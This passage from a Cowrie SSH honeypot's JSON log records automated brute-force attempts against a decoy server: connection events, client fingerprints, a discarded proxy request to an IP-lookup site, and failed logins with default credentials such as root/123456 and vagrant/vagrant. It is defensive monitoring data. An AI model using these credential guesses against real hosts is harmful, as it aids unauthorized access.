ert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:52:06.130508Z","src_ip":"212.227.235.229","session":"a0d4914b2cf7"}
{"eventid":"cowrie.login.failed","username":"user","password":"admin","message":"login attempt [user/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:06.473534Z","src_ip":"212.227.235.229","session":"3e19809ce670"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:52:06.502953Z","src_ip":"212.227.235.229","session":"a2ba52fcafa9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47554,"dst_ip":"1.2.3.4","dst_port":22,"session":"6101bab49a0a","protocol":"ssh","message":"New connection: 212.227.125.160:47554 (1.2.3.4:22) [session: 6101bab49a0a]","sensor":"my-vps","timestamp":"2025-08-31T04:52:06.799488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:52:06.800499Z","src_ip":"212.227.125.160","session":"6101bab49a0a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:52:06.989105Z","src_ip":"212.227.125.160","session":"6101bab49a0a"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:07.122539Z","src_ip":"212.227.235.229","session":"a2ba52fcafa9"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"vagrant","message":"login attempt [vagrant/vagrant] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:07.558436Z","src_ip":"212.227.125.160","session":"6101bab49a0a"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:07.777371Z","src_ip":"212.227.235.229","session":"3e19809ce670"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:08.748922Z","src_ip":"212.227.125.160","session":"6101bab49a0a"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"zabbix","message":"login attempt [zabbix/zabbix] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:09.356241Z","src_ip":"212.227.125.160","session":"5a343e681da5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46664,"dst_ip":"1.2.3.4","dst_port":22,"session":"f06d3d6ebc10","protocol":"ssh","message":"New connection: 212.227.235.229:46664 (1.2.3.4:22) [session: f06d3d6ebc10]","sensor":"my-vps","timestamp":"2025-08-31T04:52:09.652159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:52:09.729413Z","src_ip":"212.227.235.229","session":"f06d3d6ebc10"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:52:09.906858Z","src_ip":"212.227.235.229","session":"f06d3d6ebc10"}
{"eventid":"cowrie.login.failed","username":"master","password":"master","message":"login attempt [master/master] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:10.766416Z","src_ip":"212.227.235.229","session":"a0d4914b2cf7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49974,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d074610f9f9","protocol":"ssh","message":"New connection: 212.227.125.160:49974 (1.2.3.4:22) [session: 7d074610f9f9]","sensor":"my-vps","timestamp":"2025-08-31T04:52:11.338058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:52:11.776283Z","src_ip":"212.227.125.160","session":"7d074610f9f9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:52:11.776906Z","src_ip":"212.227.125.160","session":"7d074610f9f9"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:12.025062Z","src_ip":"212.227.235.229","session":"a0d4914b2cf7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36594,"dst_ip":"1.2.3.4","dst_port":22,"session":"a29104181bf0","protocol":"ssh","message":"New connection: 212.227.125.160:36594 (1.2.3.4:22) [session: a29104181bf0]","sensor":"my-vps","timestamp":"2025-08-31T04:52:12.160962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:52:12.161609Z","src_ip":"212.227.125.160","session":"a29104181bf0"}
{"eventid":"cowrie.login.failed","username":"open","password":"open","message":"login attempt [open/open] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:12.188033Z","src_ip":"212.227.235.229","session":"f06d3d6ebc10"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:52:12.349512Z","src_ip":"212.227.125.160","session":"a29104181bf0"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123","message":"login attempt [esuser/123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:12.915723Z","src_ip":"212.227.125.160","session":"a29104181bf0"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:13.946518Z","src_ip":"212.227.125.160","session":"7d074610f9f9"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:14.104733Z","src_ip":"212.227.125.160","session":"a29104181bf0"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:15.159998Z","src_ip":"212.227.235.229","session":"f06d3d6ebc10"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:15.419747Z","src_ip":"212.227.125.160","session":"7d074610f9f9"}
{"eventid":"cowrie.session.closed","duration":"77.7","message":"Connection lost after 77.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:15.942913Z","src_ip":"212.227.125.160","session":"5a343e681da5"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"zabbix","message":"login attempt [zabbix/zabbix] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:20.166222Z","src_ip":"212.227.235.229","session":"2fc2fa45bada"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48058,"dst_ip":"1.2.3.4","dst_port":22,"session":"205f7f9b494f","protocol":"ssh","message":"New connection: 212.227.125.160:48058 (1.2.3.4:22) [session: 205f7f9b494f]","sensor":"my-vps","timestamp":"2025-08-31T04:52:22.191827Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46120,"dst_ip":"1.2.3.4","dst_port":22,"session":"38b6e993d2b9","protocol":"ssh","message":"New connection: 212.227.235.229:46120 (1.2.3.4:22) [session: 38b6e993d2b9]","sensor":"my-vps","timestamp":"2025-08-31T04:52:22.838749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:52:22.843112Z","src_ip":"212.227.235.229","session":"38b6e993d2b9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:52:23.125708Z","src_ip":"212.227.235.229","session":"38b6e993d2b9"}
{"eventid":"cowrie.login.failed","username":"sergey","password":"sergey","message":"login attempt [sergey/sergey] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:24.985216Z","src_ip":"212.227.235.229","session":"38b6e993d2b9"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:26.385755Z","src_ip":"212.227.235.229","session":"38b6e993d2b9"}
{"eventid":"cowrie.session.closed","duration":"69.7","message":"Connection lost after 69.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:26.993588Z","src_ip":"212.227.235.229","session":"2fc2fa45bada"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46130,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7528017f201","protocol":"ssh","message":"New connection: 212.227.235.229:46130 (1.2.3.4:22) [session: b7528017f201]","sensor":"my-vps","timestamp":"2025-08-31T04:52:28.155262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:52:28.192183Z","src_ip":"212.227.235.229","session":"b7528017f201"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33752,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c959f1d547a","protocol":"ssh","message":"New connection: 212.227.125.160:33752 (1.2.3.4:22) [session: 2c959f1d547a]","sensor":"my-vps","timestamp":"2025-08-31T04:52:28.204654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:52:28.205169Z","src_ip":"212.227.125.160","session":"2c959f1d547a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:52:28.392794Z","src_ip":"212.227.125.160","session":"2c959f1d547a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:52:28.410914Z","src_ip":"212.227.235.229","session":"b7528017f201"}
